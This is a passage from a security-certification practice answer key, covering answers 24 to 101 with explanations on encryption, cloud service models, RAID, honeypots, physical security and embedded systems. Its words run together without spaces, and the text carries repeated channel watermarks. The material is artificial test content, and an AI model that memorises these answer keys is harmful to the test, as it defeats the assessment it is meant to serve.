24. B. IfOliviawantstoensurethatthirdpartieswillbeunabletomodifytheoperatingsystemforInternetofThings(IoT)devices,requiringsignedandencryptedfirmwareforoperatingsystemupdatesisaneffectivemeansofstoppingallbutthemostadvancedthreats.Settingadefaultpasswordmeansthatacommonpasswordwillbeknown.CheckingtheMD5sumfornewfirmwareversionswillhelpadministratorsvalidatethatthefirmwareislegitimate,butsignedandencryptedfirmwareisamuchstrongercontrol.Finally,regularpatchingmayhelpsecurethedevicesbutwon’tpreventOSmodifications.
25. B. Afterquantumencryptionanddecryptiontechnologiesbecomemainstream,itisgenerallybelievedthatnonquantumcryptosystemswillbedefeatedwithrelativeease,meaningthatquantumcryptographywillberequiredtobesecure.Qubitsarequantumbits,notameasureofspeed;quantumencryptionwillbetherelevantsolutioninapost-quantumencryptionworld;andevenverylongRSAkeysareexpectedtobevulnerable.
26. B. Countermode(CTR)makesablockcipherintoastreamcipherbygeneratingakeystreamblockusinganonrepeatingsequencetofillintheblocks.Thisallowsdatatobestreamedinsteadofwaitingforblockstobereadytosend.Itdoesnotperformthereverse,turningastreamcipherintoablockcipher,nordoesitreversetheencryptionprocess(decryption).Publickeyscannotunlockprivatekeys;theyarebothpartofanasymmetricencryptionprocess.
27. D. Blockchainpublicledgerscontainanidentityforparticipants(althoughtheidentitymaybesemi-anonymous),thetransactionrecord,andthebalanceorotherdatathattheblockchainisusedtostore.Sincethereisnocentralauthority,thereisnotokentoidentifyauthorities.
28. C. Atestservershouldbeidenticaltotheproductionserver.Thiscanbeusedforfunctionaltestingaswellassecuritytesting,beforedeployingtheapplication.Theproductionserveristheliveserver.Adevelopmentserverwouldbeonetheprogrammersuseduringdevelopmentofawebapplication,andpredeploymentserverisnotatermtypicallyusedinthe
Telegram Channel @nettrain
industry.
29. C. Stagingenvironments,sometimescalledpreproductionenvironments,aretypicallyusedforfinalqualityassurance(QA)andvalidationbeforecodeenterstheproductionenvironmentaspartofadeploymentpipeline.Stagingenvironmentscloselymirrorproduction,allowingrealistictestingandvalidationtobedone.Developmentandtestenvironmentsareusedtocreatethecodeandfortestingwhileitisbeingdeveloped.
30. C. Applicationprogramminginterface(API)keysarefrequentlyusedtomeetthisneed.AnAPIkeycanbeissuedtoanindividualororganization,andthenuseoftheAPIcanbetrackedtoeachAPIkey.IftheAPIkeyiscompromisedorabused,itcanberevokedandanewAPIkeycanbeissued.FirewallruleswrittentousepublicIPaddressescanbefragile,sinceIPaddressesmaychangeororganizationsmayhaveabroadrangeofaddressesthatmaybeinuse,makingithardtovalidatewhichsystemsorusersareusingtheAPI.Credentials,includingpasswords,arenotasfrequentlyusedasAPIkeys.
31. D. EmbeddedsystemslikesmartmeterstypicallydonotincludeaSQLservertoattack,makingSQLinjectionanunlikelyissue.Derekshouldfocusonsecuringthetrafficfromhismeter,ensuringthatdenial-of-service(DoS)attacksaredifficulttoaccomplishandthatremotelydisconnectingthemeterusingexposedadministrativeinterfacesorothermethodsisprevented.
32. A. Honeypotsaresystemsconfiguredtoappeartobevulnerable.Onceanattackeraccessesthem,theycapturedataandtoolswhilecausingtheattackertothinkthattheyaresuccessfullygainingcontrolofthesystem.ThisallowsdefenderslikeSelahtostudyandanalyzetheirtechniquesandtoolswithoutendangeringtheirproductionsystems.Anintrusiondetectionsystem(IDS)orintrusionprotectionsystem(IPS)candetectandstopattacks,andmayevencapturesometools,buttheyarenotdesignedtocapturelocalcommandsanddownloadedtools.AWAFisawebapplicationfirewallandisintendedtostopattacksonwebapplications.
33. D. Honeynetsareintentionallyvulnerablenetworkssetuptoallowforcaptureandanalysisofattackertechniquesandtools.Ablackholeisatermcommonlyusedforasystemornetworkdevicewheretrafficisdiscarded,andblackholeroutinginvolvessendingtraffictoanullroutethatgoesnowhere.
Telegram Channel @nettrain
34. B. MariashouldimplementongoingauditingoftheaccountusageontheSCADAsystem.Thiswillprovideawarningthatsomeone’saccountisbeingusedwhentheyarenotactuallyusingit.Host-basedantivirusisalmostneverabadidea,butthisscenariodidnotindicatethatthecompromisewasduetomalware,soantimalwaremaynotaddressthethreat.SincetheengineerhasaccesstotheSCADAsystem,anetworkintrusionpreventionsystem(NIPS)isunlikelytoblockthemfromaccessingthesystem,andfull-diskencryption(FDE)willnotmitigatethisthreatbecausethesystemisliveandrunning,meaningthatthediskwillbedecryptedinuse.
35. B. BothAdvancedEncryptionStandard(AES)andDataEncryptionStandard(DES)areblockciphers.Thatmeansthattheyencryptgroups(blocks)ofplain-textsymbolstogetherasasingleblock.IfyouknowthateitherAESorDESisablockcipher,youcaneliminatehalfoftheoptionshere.Ifyouknowthatablockcipherworksongroupsofsymbolsorblocksoftext,youcanalsoeliminatehalftheoptionsasincorrect.
36. A. Ahardwaresecuritymodule(HSM)isthemostsecurewaytostoreprivatekeysforthee-commerceserver.AnHSMisaphysicaldevicethatsafeguardsandmanagesdigitalkeys.Full-diskencryption(FDE)willprotectthedataonthee-commerceserver,butitwon’thelpstorethekey.Itisalsodifficulttofullyencryptthee-commerceserverdrive,sincethedrivewillneedtobeinuseforthee-commercetofunction.Aself-encryptingdrive(SED)ismerelyautomaticfull-diskencryption.Software-definednetworking(SDN)won’taddresstheissuesinthisscenario,sinceitconfiguresnetworksviasoftwareanddoesnotprovidesecurekeystorage.
37. B. TransitgatewaysareatransithubusedtoconnectVPCs(virtualprivateclouds)toon-premisesnetworks.Youcanreadmoreabouttransitgatewaysatdocs.aws.amazon.com/vpc/latest/tgw/what-is-transit-gateway.html.IBMusesthesameterm,butforaveryspecificinternalcloudconnection.
38. C. Youshouldimplementastagingserversothatcodecanbedeployedtoanintermediatestagingenvironment.Thiswillallowtestingofsecurityfeatures,aswellascheckingtoseethatthecodeintegrateswiththeentiresystem.Usingthird-partylibrariesandsoftwaredevelopmentkits(SDKs)canhelpreduceerrorsandvulnerabilitiesinthecode.Sandboxingisusedtoisolateaparticularenvironment,andvirtualizationwillnotmitigatethisrisk.Eveniftheproductionserverisvirtualized,therisksarethesame.
Telegram Channel @nettrain
Finally,deploymentpoliciesareagoodidea,buttheyarenotthemosteffectivewaytomitigatethisparticularrisk.
39. C. Ianshouldbeconcernedthatattackersmightbeabletoredirectshortmessageservice(SMS)messagessenttoVoIPphones.ThispotentialissueisonereasonthatsomemultifactordeploymentsdonotallowSMSmessagestobesenttoVoIPphonesintheenvironment,andsomeorganizationsdonotallowSMSasanoption,insteadrequiringhardwaretokensorapplication-basedmultifactorauthentication.Vishingisatypeofphishingdoneviavoice,voicemailhijackingwouldredirectvoicemailtoanothermailboxbyforwardingcalls,andweakmultifactorcodeinjectionwasmadeupforthisquestion.
40. A. Baselineconfigurations,perNIST800-53:“Baselineconfigurationsserveasabasisforfuturebuilds,releases,and/orchangestoinformationsystems.Baselineconfigurationsincludeinformationaboutinformationsystemcomponents(e.g.,standardsoftwarepackagesinstalledonworkstations,notebookcomputers,servers,networkcomponents,ormobiledevices;currentversionnumbersandpatchinformationonoperatingsystemsandapplications;andconfigurationsettings/parameters),networktopology,andthelogicalplacementofthosecomponentswithinthesystemarchitecture.Maintainingbaselineconfigurationsrequirescreatingnewbaselinesasorganizationalinformationsystemschangeovertime.Baselineconfigurationsofinformationsystemsreflectthecurrententerprisearchitecture.”
41. B. HVACsystemsareanimportantpartoftheavailabilityforsystemsandinfrastructure.TheyarealsoatargetforattackerswhotargetInternetofThings(IoT)ornetwork-connecteddevices.Theyarenotfrequenttargetsforuseinsocialengineeringefforts,althoughtheycouldbeusedthatway.Theyarenotaprimarylineofdefensefororganizations.
42. B. Symmetricencryptionistypicallyfasterthanasymmetricencryption.Thisiswhymanyprotocolsuseasymmetricencryptiontoexchangeasymmetrickey,andthenusethatkeyfortherestoftheirtransaction.Itisnotmoresecure,keylengthisnotameaningfuldifferencebetweensymmetricandasymmetricencryption,andkeydistributionforsymmetricencryptionismorechallengingforlargerpopulationsusingsymmetricencryptionifconfidentialityneedstobemaintainedbecauseeverypotentialpairofcommunicatorswouldneedadifferentsymmetrickey.
Telegram Channel @nettrain
43. C. Entropyisameasureofuncertainty.Havingsourcesofentropy(orrandomness)isakeyelementinaPRNG.Somepseudo-randomnumbergeneratorsrelyoninputfromkeyboards,mice,orotherhuman-generatedinputstohaveasourceofentropydata.
44. A. Withthesoftwareasaservice(SaaS)model,theconsumerhastheabilitytouseapplicationsprovidedbythecloudproviderovertheInternet.SaaSisasubscriptionservicewheresoftwareislicensedonasubscriptionbasis.Platformasaservice(PaaS)providestheframeworkandunderlyingtoolstobuildapplicationsandservices.Infrastructureasaservice(IaaS)providesthecomponentsofanentirenetworkandsystemsinfrastructure.Hybridmodelsusebothcloudandlocallyhostedsystems.
45. C. Resourcepoliciesareassociatedwitharesourceandallowyoutodeterminewhichprincipalshaveaccesstothatresourceaswellaswhatactionstheycantakeonit.Resourcepoliciesarenotusedtosetconsumptionlimits.
46. D. Storageareanetwork(SAN)replicationcopiesthecontentsofonerepositorytoanotherrepository,suchasanorganization’scentralSANenvironmenttoaremoteSANatthehardwareorblocklevel.
47. C. Asnapshotisanimageofthevirtualmachine(VM)atsomepointintime.Itisstandardpracticetoperiodicallytakeasnapshotofavirtualsystemsothatyoucanreturnthatsystemtoalastknowngoodstate.Sandboxingistheprocessofisolatingasystemorsoftware.Thehypervisoristhemechanismthroughwhichthevirtualenvironmentinteractswiththehardware,andelasticityistheabilityforthesystemtoscale.
48. D. RAIDlevel5isdiskstripingwithdistributedparity.Itcanwithstandthelossofanysingledisk.RAID0isdiskstriping;itdoesnotprovideanyfaulttolerance.RAID1ismirroring.Itdoesprotectagainstthelossofasinglediskbutnotwithdistributedparity.RAID3isdiskstripingwithdedicatedparity.Thismeansadedicateddrivecontainingalltheparitybits.
49. D. AFaradaycage,namedafterphysicistMichaelFaraday,involvesplacingwiremesharoundanareaordevicetoblockelectromagneticsignals.AVLANcansegmentanetworkbutwon’tblockelectromagneticinterference(EMI).Software-definednetworking(SDN)virtualizesanetworkbutdoesnotprotectagainstEMI.ATrustedPlatformModule(TPM)isusedforcryptographicapplications.
50. B. Thecorrectanswerisbollards.Thesearelargeobjects,oftenmadeof
Telegram Channel @nettrain
concreteorsimilarmaterial,designedspecificallytopreventavehiclegettingpastthem.Mostgatescanbebreachedwithavehicle.Asecurityguardisagoodidea,buttheywouldnotbeabletostopavehiclefromrammingthebuilding.Securitycameraswillprovideevidenceofacrimethatwascommittedbutwon’tpreventthecrime.
51. A. Attachingcablelockstothecomputersandlockingthemtothetablewillmakeitmoredifficultforsomeonetostealacomputer.Full-diskencryption(FDE)won’tstopsomeonefromstealingthecomputer,norwillstrongpasswords.Asign-insheetisagoodideaandmaydetersomethefts,butitisnotthebestapproachtostoppingtheftofferedinthisscenario.
52. B. Thecorrectansweristoincorporatetwo-factorauthenticationwithamantrap.Byhavingasmartcardatonedoor(typeIIauthentication)andaPINnumber(typeIauthentication)attheotherdoor,Joannewillcombinestrongtwo-factorauthenticationwithphysicalsecurity.Smartcardsbythemselves,orpairedwithafence,arestillsingle-factorauthentication.Videosurveillance,thoughoftenagoodidea,won’thelpwithtwo-factorauthentication.
53. A. Baseliningistheprocessofestablishingastandardforsecurity.Achangefromtheoriginalbaselineconfigurationisreferredtoasbaselinedeviation.Securityevaluationsorauditschecksecuritybutdon’testablishsecuritystandards.Hardeningistheprocessofsecuringagivensystem,butitdoesnotestablishsecuritystandards.Normalizationistheprocessofremovingredundantentriesfromadatabase.
54. A. Faketelemetryistelemetrycreatedtomakeanattackerbelievethatahoneypotsystemisalegitimatesystem.Buildingabelievablehoneypotrequiresmakingthesystemasrealisticaspossible.Deepfakesareartificialintelligence(AI)-createdvideosthatmakeitappearthatindividualsaresayingordoingactionstheyneveractuallyperformed.Therestoftheoptionsweremadeupforthisquestion.
55. A. RAID1+0,orRAID10,isamirroreddataset(RAID1),whichisthenstriped(RAID0):a“stripeofmirrors.”RAID6isdiskstripingwithdualparity(distributed),RAID0isjuststriping,andRAID1isjustmirroring.
56. D. Normalizationistheprocessofremovingduplicationorredundantdatafromadatabase.Therearetypicallyfourlevelsofnormalizationrangingfrom1Natthelowest(i.e.,themostduplication)to4Natthehighest(i.e.,theleastduplication).Althoughdatabaseintegrityisimportant,thatisnot
Telegram Channel @nettrain
whatisdescribedinthequestion.Furthermore,integritycheckingusuallyreferstocheckingtheintegrityoffiles.Deprovisioningisavirtualizationtermforremovingavirtualsystem(server,workstation,etc.)andreclaimingthoseresources,andinthecontextofidentitymanagementmeansremovinganaccountorpermissions.Baselininginvolvessettingsecuritystandards.
57. C. RemoteAuthenticationDial-inUserService(RADIUS)providesauthentication,authorization,andaccounting,whichmakeupthethreecriticalelementsinAAAsystems.OpenIDisaprotocolforauthenticationbutdoesnotprovideauthorizationbyitself.LightweightDirectoryAccessProtocol(LDAP)isadirectoryservice,andSecurityAssertionMarkupLanguage(SAML)isamarkuplanguageformakingsecurityassertions.
58. D. TLSinspection(oftencalledSSLinspectionbecausethetermSSLremainswidely,ifincorrectly,inuse)involvesinterceptingencryptedtrafficbetweentheclientandserver.TLSinterceptiondevicesactasanon-pathattackanddecrypttraffictoscanandanalyzeit,oftenformalwareorothersignsofattacks,andthenencryptittosenditontoitsdestination.Asyoumightexpect,TLSinspectionhasbothlegitimateandmalicioususes.
59. D. Inmostcasesnoneoftheseoptionsarepractical.Destructionofdronesisanillegaldestructionofprivateproperty.JammingtheopenfrequenciesusedfordronesisnotpermissibleandmayresultinactionbytheFederalTradeCommission(FTC),andcontactingtheFederalAviationAdministration(FAA)torequestthattheairspaceaboveacompanybedeclaredano-flyzoneisnotsomethingtheFAAsupportsinmostcases.ThismeansthatDianaislikelytohavetodealwiththepotentialfordrone-basedthreatsinotherways.
60. B. Isaachasbuiltandconfiguredasystemwherenonpersistenceofsystemscancreateforensicchallenges.Hisorganizationneedstoconsiderhowtheycanmakecopiesofcompromisedorproblematicephemeralsystemsandstoretheminasafelocationforforensicanalysis.Thisisnotaforensic-resistantsystem—ifhehadacopy,hewouldhavebeenabletoanalyzeit.Live-bootmediaisnotmentionedorusedinthisexample,andterminateandstayresident(TSR)isatypeofprogramrunintheDOSoperatingsystemthatreturnedcontroltotheoperatingsystembutremainedinmemorysothatitcouldbeeasilyrunagainasneeded.
61. D. StoredproceduresarethebestwaytohavestandardizedSQL.Rather
Telegram Channel @nettrain
thanprogrammerswritingtheirownSQLcommands,theysimplycallthestoredproceduresthatthedatabaseadministratorcreates.Formalcodeinspectionmightdetectalackofsecuritypracticesanddefensesbutwon’tstopSQL-basedattacks.Policiesrequiringstoredproceduresmighthelpbutarealessdirectpathtothesolution.Finally,agileprogrammingisamethodfordevelopingapplicationsrapidlyandwon’tdeterminehowSQLcommandsarecreated.
62. C. Servicesintegrationincloudandvirtualizationenvironmentscanbeverycomplexandcaninvolvedata,APIs,andothertypesofapplicationintegration.Integrationplatformsalloworganizationstouseastandardizedtoolratherthanbuildingandmaintainingtheirown.Thisallowsthemtofocusontheactualintegrationsratherthantheunderlyingsystem,savingtimeandeffort.SinceintegrationplatformsalsooftenhavepreexistingtoolsforcommonservicesandAPIs,theycansavesignificantamountsoftimefororganizationsthatadoptthem.Ofcourse,thisalsointroducesanotherplatformtoassessandsecure.
63. B. WhenvirtualizationreachesthepointthatITcannolongereffectivelymanageit,theconditionisknownasVMsprawl.VMoverloadandVMspreadaremadeupforthisquestion,andaVMzombieisatermforavirtualmachinethatisrunningandconsumingresourcesbutnolongerhasapurpose.
64. A. VMescapeisasituationwhereinanattackerisabletogothroughtheVMtointeractdirectlywiththehypervisorandpotentiallythehostoperatingsystem.ThebestwaytopreventthisistolimittheabilityofthehostandtheVMtoshareresources.Ifpossible,theyshouldnotshareanyresources.Patchingmightmitigatethesituation,butitisnotthemosteffectivesolution.UsingfirewallsandantimalwaretoolsisagoodsecuritypracticebutwouldhaveminimaleffectonmitigatingVMescape.
65. A. Ireneislookingforasoftware-as-a-service(SaaS)toolthatallowshertoperformthespecificfunctionthatherorganizationneedstoaccomplish.AnSaaSservicedoesnotrequiresystemadministrationorprogrammingandtypicallyrequiresminimalconfigurationtoperformitsnormalfunctionality.Platform-as-a-service(PaaS)typicallyrequiressomeconfigurationorprogramming,andinfrastructure-as-a-service(IaaS)willrequiresystemsadministration,programming,orconfiguration—orallthree!Identity-as-a-service(IDaaS)isaspecifictypeofsolutionthatwasnotdescribedaspartofIrene’sneeds.
Telegram Channel @nettrain
66. D. Serverlessarchitecturesdonotrequireasystemadministratorbecausetheprovidermanagestheunderlyingfunction-as-a-service(FaaS)capability.Itcanalsoscaleuporscaledownasneeded,allowingittobeveryflexible.Serverlessarchitecturesaretypicallynotidealforcomplexapplicationsandinsteadtendtoworkbetterformicroservices.
67. A. Thecorrectansweristohaveamotion-activatedcamerathatrecordseveryonewhoenterstheserverroom.Motionrecognitionisanimportantfeatureinthistypeofscenario,wherecamerasoperateinaspacewherethereislittlephysicaltrafficandstoragewouldbewastedbyrecordingempty,unusedspaces.Smartcards,deadbolts,andloggingwon’tdetecttheft.
68. C. ADomainNameSystem(DNS)sinkholeisaDNSserverusedtospoofDNSserversthatwouldnormallyresolveanunwantedtomalicioushostname.Trafficcanbesenttoalegitimatesystem,causingwarningstoappearontheuser’sscreen,orsimplysenttoanullrouteornonexistentsystem.Anintrusiondetectionsystem(IDS)cannotstoptraffic,round-robinDNSisawaytospreadDNStraffic,andaWAFisawebapplicationfirewall,andnothinginthisquestionindicatesthatthereisaweb-specificissue.
69. C. Hotaisle/coldaisleisalayoutdesignforserverracksandothercomputingequipmentinadatacenter.Thegoalofahotaisle/coldaisleconfigurationistoconserveenergyandlowercoolingcostsbymanagingairflow.Aninfraredcamerawilldetectheatlevelsontheaisles.Althoughtherestoftheoptionsarepotentialissuesforadatacenter,aninfraredcamerawon’thelpwiththem.
70. D. Asecurityguardisthemosteffectivewaytopreventunauthorizedaccesstoabuilding.OptionsA,B,andCareallincorrect.Theseareallgoodphysicalsecuritymeasures,buttheyarenotthemosteffectivewaystoprevententryintoabuilding.
71. B. Software-definednetworking(SDN)makesthenetworkveryscalable.Itisrelativelyeasytoaddonnewresourcesorremoveunneededresources,andithelpswithhighavailabilityefforts.SDNdoesnotstopmalware,detectintrusions,orpreventsessionhijacking.
72. A. Thecorrectansweristouseanapplicationcontainertoisolatethatapplicationfromthehostoperatingsystem.Applicationcontainersprovideavirtualizedenvironmentinwhichtorunanapplication.Movingto
Telegram Channel @nettrain
software-definednetworking(SDN)isaveryinvolvedprocessanddoesnotprovideanefficientsolution.RunningtheapplicationinaseparateVLANwillnotseparatetheapplicationfromthehostoperatingsystem;itmightnotsolvetheproblem.Sincethisisalegacyapplication,insistingonanupdatedversionoftheapplicationisn’tfeasible.
73. D. Eachoftheoptionsaboveisapotentialriskwhenusingthird-partylibrariesorSDKs.Organizationsneedtounderstandandassesstherisksofthird-partycode,butitisacommonpracticetousethird-partylibraries.Identifyingtrustworthyandreliablesourcesandmanagingtheversionsandupdatesarecriticaltousingthird-partycomponentssafely.
74. B. Acloudaccesssecuritybroker(CASB)isusedtomonitorcloudactivityandusageandtoenforcesecuritypoliciesonusersofcloudservices.
75. A. Microservicearchitecturesbuildapplicationsasasetoflooselycoupledservicesthatprovidespecificfunctionsusinglightweightprotocols.Itdoesn’tspecificallydefinethesizeofthesystems,butitisnotatightlycoupledenvironment.Protocolchoiceisoftenopenstandards-based,buttheemphasisisonlightweightprotocols.Thereisnotarequirementthatservicesbein-houseorthirdpartyexclusively.
76. C. ThecorrectansweristoimplementIaC.Infrastructureascode(IaC)istheprocessofmanagingandprovisioningcomputerdatacentersthroughmachine-readabledefinitionfiles,ratherthanphysicalhardwareconfigurationorinteractiveconfigurationtools.Whetherthedatacenter(s)usephysicalmachinesorvirtualmachines,thisisaneffectivewaytomanagethedatacenters.Althoughdatacentermanagersmaybeneeded,thatwon’tnecessarilyprovideconsistentmanagementacrosstheenterprise.Software-definednetworking(SDN)willnotfixthisproblem,butitwouldhelpifsheneededtoconfigureandmanagehernetworkbasedonusageandperformance.Finally,thisissueisnotjustaboutprovisioning;itisaboutmanagement.
77. D. OAuthisacommonauthorizationserviceusedforcloudservices.Itallowsuserstodecidewhichwebsitesorapplicationstoentrusttheirinformationtowithoutrequiringthemtogivethemtheuser’spassword.OpenIDisfrequentlypairedwithOAuthastheauthenticationlayer.Kerberosismorefrequentlyusedforon-siteauthentication,andSAMLisSecurityAssertionMarkupLanguage.
Telegram Channel @nettrain
78. C. InthisscenarioGregshouldidentifytheuseoftheprintersforfurtherattacksagainsttheorganizationasthemostcriticalrisk.Useaspartofadistributeddenial-of-service(DDoS)attackdoesnotdirectlyimpacttheorganizationinmostcases,exhaustingsupplieswouldbeanannoyance,andtheriskofscanningdocumentsfromaremotelocationrequiressensitivedocumentstobeleftintheMFPs.GregshouldnotethatalloftheseissuescouldbeproblemsandmovetheMFPstoaprotectednetworksothatthirdpartiescan’taccessthem.
79. D. ThesystemsthatKeithhasdeployedarethinclients,computersthatdonotruntheirapplicationsandstoragefromtheirlocaldrivesandinsteadrelyonaremoteserver.CloudandvirtualizationimplementationsofthisprovidingvirtualdesktopsarecalledVDI,orVirtualDesktopInfrastructure,butdonotnecessarilyrequireathinclient,sincetheycanworkonafullycapablecomputer(orthickclient).Client-as-a-serverisamade-upterm.
80. B. Thisreal-worldexamplewasfoundin2020whenmaliciousPowerShellcodewasdiscoveredthattriple-encodedmalicioustools.Theinitialpackagewasdownloadedasanimagefromimgur.comorsimilarsitesandwasconcealedusingsteganographictechniques.ThecodewasalsoencryptedusingRSAandencodedinBase64bothpriortoencryptionandagainafterencryption.Althoughsteganographyisnotincrediblycommon,Henryshouldsuspectthatadownloadedimagemaybemorethanitappears.
81. A. Storingdatainplaintextwillnothelppreventdataexposureand,infact,ismorelikelytoresultindataexposure.Instead,Mollyshouldencourageherdeveloperstostoreandtransmitsensitivedatainanencryptedform.TheyshouldalsoleverageHTTPSforallauthenticatedpages,andpotentiallyallpages.Hashingpasswordsusingsaltsisimportantforpasswordsecurity,andensuringthattokensarenotexposedviasiteslikeGitHuborotherpubliccoderepositoriesisimportantforapplicationanddatasecurity.
82. C. Usingsecurefirmware,aswellasusinganRTOSwithtimeandspacepartitioning,arebothcommonmethodstohelpensureRTOSsecurity.Unliketraditionaloperatingsystems,real-timeoperatingsystemsareusedinapplicationswheretheyneedtodealwithinputsimmediately.ThatmeansthataddingadditionalloadlikefirewallsandantimalwareisnotatypicalcomponentinRTOSapplications.Forsimilarreasons,you’re
Telegram Channel @nettrain
unlikelytofindawebbrowseronmostdevicesrunninganRTOS.
83. B. Inacodereuseattack,theattackerexecutescodethatismeantforsomeotherpurposes.Inmanycasesthiscanbeoldcodethatisnolongerevenused(deadcode),evenifthatcodeisinathird-partylibrary.Abufferoverflowoccurswhentoomuchdataissenttoabuffer.Forexample,sayabufferisdesignedtohold10bytes,anditissent100bytes,causingtheadditionaldatatobeputintounexpectedmemorylocations.Adenial-of-service(DoS)attackismeanttomakeaserviceorsystemunavailabletolegitimateusers.Sessionhijackinginvolvestakingoveranexistingauthenticatedsession.
84. C. Zigbeeisspecificallydesignedforthistypeofusage.Narrowbandradiosarenottypicallyinuseforthistypeofpurpose,andbasebandradiorequiresverylargeantennastousethelow-frequencyspectrum.Cellularoptionsrequireacarrierandarenotwellsuitedtodirectpeer-to-peerconfigurations.
85. B. Homomorphicencryptioncanperformcomputationsontheciphertextwithoutaccesstotheprivatekeythattheciphertextwasencryptedwith.Whenthecomputationsarecompleted,theresultsarethesameasifthosecomputationshadbeenperformedagainsttheoriginalplaintext.Identity-preservingandreplicableencryptionweremadeupforthisquestion.
86. A. Fingerprintreadersystemsarethemostwidelyacceptedbiometricsystemsincommonuseforentryaccessandotherpurposestoday.Facialrecognitionsystemsareincreasinglyinuseandarealsolikelytobemoreacceptedbyuserpopulationsbasedontheirbroaddeploymentinphones,buttheyarenotlistedasanoption.Bothretinaandirisscansarelesslikelytobeaccepted,whereasvoicesystemsarebothrelativelyuncommonandmoredisruptiveforfrequentusage.
87. C. Tapebackupsarethemostcommonsolutionforcoldbackupsoff-site.Cloudbackupstoacoldrepositoryareincreasinglypopularoptionsandmaybefasterforsomeretrievalscenarios,buttheyarenotlistedasoptions.Storageareanetwork(SAN)andnetwork-attachedstorage(NAS)devicesarenotcommonlyusedforcoldbackupandareinsteadusedforonlineornearlineoptions.Diskbackupcouldbeusedbutremainslesscommonthantapeforatruecoldbackupscenario.
88. B. Off-sitestoragehastobalanceavailabilityandtheabilitytobeusedintheeventthatadisasterorothereventoccurs.Inthiscase,Allanshould
Telegram Channel @nettrain
lookatafacilityfarenoughawaythatasingledisastercannottakebothsitesoffline.
89. D. Embeddedsystemscanbringabroadrangeofsecurityimplications,manyofwhicharedrivenbythelimitedcapabilitiesoftheprocessorsandhardwaretheyarefrequentlybuiltwith.Low-powerconsumptiondesignsmaylackcomputationalpowerandthushavechallengesimplementingstrongcryptography,networkconnectivity,andothersimilarproblems.Patchingembeddedsystemscanbechallengingbothbecauseofwheretheyaredeployedandbecauseofalackofconnectivityforthem—infact,inmanyenvironments,youmaynotwantthedevicestobeconnectedtoyournetwork.Sincemanydon’thaveascreen,keyboard,oranetworkconnection,authenticationisalsoaproblem.Fewembeddeddevices,however,needbulkstorage,makingthelackofbulkstorageaproblemthattypicallyisn’tamajorconcern.
90. B. Systemonachip(SoC)devicesarecompleteself-containedsystemsonasinglechip.Therefore,havingtheirownuniquecryptographickeysisthebestwaytoimplementauthenticationandsecurity.OptionAisincorrect.Asystemonachipisself-contained,soaTrustedPlatformModule(TPM)wouldnotbeanappropriatesolution.OptionCisincorrect.Aself-encryptingdrive(SED)isnotrelevanttosystemonachip,sincethatsystemdoesnothavea“drive.”OptionDisincorrect.ManySoCtechnologiesdon’tuseaBIOS.
91. A. Suchsystemsneedtohaveallcommunicationsencrypted.Asofthecurrentdate,breachesofportablenetworkdeviceshaveallinvolvedunencryptedcommunications.OptionBisincorrect.Full-diskencryption(FDE)mayormaynotevenbeappropriateforsuchdevices.Manydon’thaveadisktoencrypt.OptionCisincorrect.Itmaynotbepossibletoinstallantimalwareonmanysuchdevices.OptionDisincorrect.Fuzztestingisusedforapplications.
92. D. Themorevehiclesutilizecomputersandhavenetworkcommunicationcapabilities,themoretheywillbevulnerabletocyberattacks.OptionsA,B,andCareallincorrect,asalloftheseareconcernsratherthanjustone.
93. A. Anadvantageofcompilingsoftwareisthatyoucanperformstaticcodeanalysis.ThatmeansAmandacanreviewthesourcecodeforflawsandcouldevenremediateflawsiftheywerefound.Bothbinariesandcompiledcodecanbetestedinaliveenvironment(dynamicanalysis),andchecksums
Telegram Channel @nettrain
forbothcanbevalidated.
94. A. RFCs,orrequestsforcomment,arehowInternetprotocolsaredefinedanddocumented.Wikipediaisnotthedefinitiveresource,andtheInternetArchiveactivelyarchivestheInternetbutdoesnotdefineprotocols.
95. C. Standardnamingconventionstypicallydonothelptoconcealsystemsfromattackers.Attackerscanstillscanforsystemsandmayevenbeabletousethenamingconventiontoidentifythepurposeofasystemifthenamingconventionincludesapurposeortechnologyinthename.Namingconventionsdomakestandardizationeasierandcanhelpadministratorsquicklyidentifywhatamachinedoes,whilemakingitsimplertoincludesystemsinscripts.Amachinethatdoesn’tmatchislikelytobearogueormisconfigured.
96. B. Thisisanexampleofacontinuousintegration/continuousdelivery(CI/CD)pipeline.Thereisnomentionofmonitoringsystems,andalthoughcodeanalysisishappeninghereintesting,itisdynamictesting,notsourcecodeanalysis.Thereisnomentionofmalwareinthepipeline.
97. D. Althoughgaitanalysisisnotcommonlyusedforidentificationandauthorizationpurposes,itisusedinsituationswherecrowdfootageisavailabletoidentifyindividuals.Vein,voiceprint,andfingerprintanalysisarenotusefulinmostscenariosinvolvingheavilyusedandcrowdedspaces.
98. C. Acommunitycloudpresentsacompromisesolution.Communitycloudsaresemi-private.Theyarenotaccessibletothegeneralpublicbutonlytoasmallcommunityofspecificentities.Thereareriskswithpublicclouds,astherearewithanyenvironment.Privatecloudscanbequiteexpensivetobuildout,particularlyforsmallerorganizationsthatcannotaffordstaffingorhardware.Finally,recommendingagainstacloudsolutiondoesnotmatchthecompany’sstatedgoal.
99. D. Usinginfrastructureasaservice(IaaS)makesthemostsensehere;itmeetsthecloudrequirementdescribedandwouldallowadditionalsystemstobequicklycreatedorremovedasneeded.Platformasaservice(PaaS)doesnotprovidedirectaccesstoLinuxsystemstobuildoutapplicationsandrelatedconfiguration.Settingupdualbootandbuildingmachinesarenotcloudsolutionsasdescribed.Whenyouanswerquestionslikethis,makesureyoureadandmeetalltherequirementsinthequestion.
100. A. Oneofthedangersofautomationandscriptingisthatthescriptswilldoexactlywhattheyarewrittentodo.Thatmeansthatascriptlikethose
Telegram Channel @nettrain
thatCorrinehasbeenaskedtowritethatdoesn’thaverulesthatpreventitfromblockingcriticalsystemscouldblockthosesystems.ThereisnoindicationinthequestionofanyissueswithprivateIPaddresses,andfilteringthemwouldrequiremorework.Attackerscouldpotentiallyusethescriptsiftheydiscoveredthem,butifthey’reabletoaccesssecurityscriptsthereislikelyadeeperproblem.Finally,auditorstypicallydonotreviewscriptsandinsteadaskabouttheexistenceofcontrols.
101. D. Differentialbackupsbackupallofthechangessincethelastfullbackup.Anincrementalbackupbacksupallchangessincethelastincrementalbackup.Asnapshotcapturesmachinestateandthefulldriveatabitwiselevel,andfullbackupsareacompletecopyofasystembuttypicallydonotincludethememorystate.
